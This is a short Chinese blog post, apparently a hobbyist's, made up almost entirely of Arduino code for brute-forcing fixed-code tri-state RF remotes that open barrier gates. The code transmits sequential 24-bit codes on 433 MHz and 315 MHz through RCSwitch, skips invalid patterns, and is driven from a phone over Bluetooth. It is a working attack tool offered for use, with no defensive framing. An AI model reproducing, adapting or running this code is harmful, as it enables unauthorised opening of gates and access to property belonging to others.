模拟三态八位遥控器穷举攻击道闸           

模拟三态八位遥控器穷举攻击道闸

11 Jan 2021

//发射端使用超再生或者超外差都可以,注意电压足够,大功率发射模块要注意电源瞬时电流足够
//使用软件串口
#include <SoftwareSerial.h>
SoftwareSerial BT(8, 9);  //新建对象,接收脚为8,发送脚为9

#include <RCSwitch.h>
RCSwitch sw433 = RCSwitch();
RCSwitch sw315 = RCSwitch();

static int tp = 48;//48,192,12,3
static unsigned long t_i = 20000;//循环执行的初始值

void setup() {
  BT.begin(9600);  //设置波特率


  sw433.enableTransmit(11); 
  sw315.enableTransmit(10); 
  
  sw433.setPulseLength(340); 
  sw315.setPulseLength(470);

  pinMode(13, OUTPUT); 

  BT.println("bt is ready!!");
  // digitalWrite(13, HIGH);
  //digitalWrite(13, LOW); 
}

byte func_send(unsigned long key)
{
        char dest[25];
        dest[24] = '\0';
        for (int j = 0; j < 24; j++)
            dest[j] = '0';
        //初始化完毕,补齐后8位按钮值
        if(tp == 48)
        {
          dest[18] = '1';
          dest[19] = '1';
        }
        else if(tp == 3)
        {
          dest[22] = '1';
          dest[23] = '1';
        }
        else if(tp == 12)
        {
          dest[20] = '1';
          dest[21] = '1';

        }
        else if(tp == 192)
        {
          dest[16] = '1';
          dest[17] = '1';
        }
        //把整数变成二进制字符串,不足16位,补上0
        char buf[20];
        itoa(key, buf, 2);
        int len = strlen(buf);
        for (int j = 0; j < len; j++)
        {
            dest[16 - len + j] = buf[j];
        }
        int is_3t = 0;//判断是否3态中含有10,舍弃掉
        for (int j = 0; j < 16; j = j + 2)
        {
            if (dest[j] == '1' && dest[j + 1] == '0')
            {
                is_3t = 1;
                break;
            }
        }
        if (is_3t == 1) return 0;
        
         char ibuf[20];
         sprintf(ibuf,"key:%ld,%d",key,tp);
         BT.println(ibuf);
         BT.println(dest);
         sw433.send(dest);
         sw315.send(dest);        
         return 1;
        
}


 
void loop() 
{

if (BT.available()) 
{
    int val = BT.read();
    switch(val)
    {
      case 1://修改3态八位遥控器后8位按钮值
      {
        BT.println("1被按下");
        if(tp == 48) tp=192;
        else if(tp == 192) tp = 3;
        else if(tp==3) tp=12; 
        else if(tp=12) tp=48;
           
        BT.print("当前tp值");
        BT.println(tp);  
      }  
      break;
      case 2:
      {
        BT.println("2,单次执行t_i");
        BT.println(t_i);  
        func_send(t_i);   
      }
      break;
      case 3:
      {
        BT.println("3,send 10次");
        long count = 0;
        while(1)
        {
          byte b = func_send(t_i);
          t_i=t_i+1;
          if(b==1)
          {
             count = count + 1;
          }
          if(count>=10) break;  
        }

        BT.println("3号按键执行完毕");  
      }
      break;
      case 4:
      {
       BT.println("4,send +1次");
        long count = 0;
        while(1)
        {
          byte b = func_send(t_i);
          t_i=t_i+1;
          if(b==1)
          {
             count = count + 1;
          }
          if(count>=1) break;  
        }

        BT.println("4号按键执行完毕");  

      }
      break;
      case 5:
      {
         BT.print("5被按下,t_i+1=");
         t_i=t_i+1;
         BT.println(t_i);

      }
      break;
      
      case 6:
      {
        BT.print("6被按下,t_i+10=");
         t_i=t_i+10;
         BT.println(t_i);
       

      }
      break;
      case 0x0a:
      {
        BT.println("上被按下,t_i=0");
        t_i=0;
      }
      break;
      case 0x0b:
      {
        BT.println("下被按下,t_i=29500");
        t_i=29500;
      }
      break;
        case 0x0c:
      {
        BT.print("左被按下,t_i-100=");
        t_i=t_i-100;
         BT.println(t_i);
      }
      break;    
        case 0x0d:
      {
        BT.print("右被按下,t_i+100=");
        t_i=t_i+100;
         BT.println(t_i);
      }
      break; 
      
      default:
      {
        BT.println("==============================");
        BT.println("1:tp    2:  send   3: send 10");
        BT.println("4:send+1 5:  +1   6:   +10  ");
        BT.println("上:0   下:  20000");   
        BT.println("左:-100   右:+100");   
        BT.println("------------------------------");
        BT.print("初始值为29500,当前为:");    
        BT.println(t_i);     
      }
      break;
    }

     
}
else
{
      
}




}